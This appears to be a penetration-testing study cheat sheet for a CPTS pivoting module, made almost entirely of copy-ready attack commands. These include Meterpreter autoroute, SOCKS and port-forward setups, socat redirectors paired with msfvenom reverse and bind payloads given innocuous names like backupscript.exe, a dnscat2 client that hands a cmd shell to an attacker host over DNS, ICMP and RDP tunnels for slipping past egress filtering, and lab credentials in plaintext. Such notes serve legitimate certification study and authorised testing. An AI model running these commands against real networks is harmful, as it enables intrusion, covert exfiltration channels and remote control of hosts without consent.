Tunneling & Pivoting Techniques
The rest of the CPTS pivoting module beyond SSH and Ligolo: host discovery on the second network, Meterpreter autoroute/SOCKS/portfwd, socat reverse + bind redirection, plink.exe and netsh on Windows, plus the covert tunnels — dnscat2 (DNS), ptunnel-ng (ICMP) and SocksOverRDP. Ligolo-ng is the modern alternative to Chisel; reach for these when SSH or a tun interface isn't an option. Every payload is its own copy block.
Picking a tool: Ligolo-ng is the cleanest modern pivot (a tun interface, no proxychains) and is the preferred alternative to Chisel; SSH forwarding covers -L/-R/-D + sshuttle + chisel. This note collects everything else in the module for when those don’t fit: Meterpreter-native pivots, OS-native tools (socat, plink, netsh), and covert tunnels (DNS, ICMP, RDP).
Discover the second network
Once you land on a dual-homed pivot, find the hidden subnet before tunnelling.
Meterpreter ping sweep:
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23Bash one-liner on a Linux pivot:
for i in {1..254}; do (ping -c 1 172.16.5.$i | grep "bytes from" &); doneCMD one-liner on a Windows pivot:
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"PowerShell sweep:
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}Meterpreter pivoting
You already have a Meterpreter session on the pivot — route through it instead of SSH.
SOCKS proxy + autoroute (whole subnet)
Add a route to the hidden subnet through the session:
run autoroute -s 172.16.5.0/23Start a SOCKS proxy that rides the route:
use auxiliary/server/socks_proxyset SRVPORT 9050set VERSION 4arunPoint proxychains at it:
echo 'socks4 127.0.0.1 9050' | sudo tee -a /etc/proxychains.confThen scan/connect through the pivot:
proxychains nmap -sT -Pn -p3389 172.16.5.19portfwd (single port)
Local relay — pull an internal port to your localhost:
portfwd add -l 3300 -p 3389 -r 172.16.5.19Use it:
xfreerdp /v:localhost:3300 /u:victor /p:pass@123Reverse relay — listen on the pivot, forward back to your handler:
portfwd add -R -l 8081 -p 1234 -L 10.10.14.18socat redirection
A standalone bidirectional relay — no SSH needed. Run it on the pivot.
Reverse-shell redirector
On the pivot, listen and forward back to your attack host:
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80Build a payload that calls back to the pivot (172.16.5.129:8080):
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 LPORT=8080 -f exe -o backupscript.exeBind-shell redirector
On the pivot, forward inbound connections to a bind shell on an internal host:
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443Bind payload to drop on the internal Windows host:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8443 -f exe -o backupjob.exeWindows-native forwarding
plink.exe (dynamic SOCKS from a Windows attack host)
Open a SOCKS proxy over SSH from Windows (then point Proxifier at 127.0.0.1:9050):
plink -ssh -D 9050 ubuntu@10.129.15.50netsh portproxy
Forward a listening port on the compromised Windows host to an internal target:
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25Verify the rule:
netsh.exe interface portproxy show v4tov4Then connect to the pivot’s 8080 from your box:
xfreerdp /v:10.129.15.150:8080 /u:victor /p:pass@123Covert tunnels
When egress is filtered, tunnel over a protocol the firewall lets through.
dnscat2 (DNS tunneling)
Start the server on your attack host (authoritative for the domain):
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cacheOn the Windows target, import the PowerShell client:
Import-Module .\dnscat2.ps1Connect back with the server’s pre-shared secret and hand over a shell:
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret <SECRET> -Exec cmdptunnel-ng (ICMP tunneling)
On the pivot, start the server (accepts ping packets on its reachable IP):
sudo ./ptunnel-ng -r10.129.202.64 -R22On your attack host, open the client and map local 2222 into the tunnel:
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22SSH through the ICMP tunnel:
ssh -p2222 -lubuntu 127.0.0.1SocksOverRDP (tunnel SOCKS over an RDP channel)
On the first Windows host, register the plugin DLL:
regsvr32.exe SocksOverRDP-Plugin.dllAfter RDP’ing onward with the plugin active, confirm the SOCKS listener (then point Proxifier at 127.0.0.1:1080):
netstat -antb | findstr 1080rpivot (reverse SOCKS through an HTTP/NTLM proxy)
When the pivot can’t accept inbound and must dial out (even via a corporate NTLM proxy).
Server on your attack host:
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0Client on the pivot, dialing back to you:
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999Through an authenticated NTLM proxy:
python2.7 client.py --server-ip <YOUR_IP> --server-port 9999 --ntlm-proxy-ip <PROXY> --ntlm-username <user> --ntlm-password <pass>Tool selection: prefer Ligolo-ng (or SSH
-D) for a clean SOCKS pivot; drop to Meterpreter autoroute/portfwd when you’re already in MSF; use socat/netsh/plink when you only have native binaries; and reach for dnscat2 / ptunnel-ng / SocksOverRDP only when TCP egress is filtered and you must tunnel over DNS, ICMP or RDP.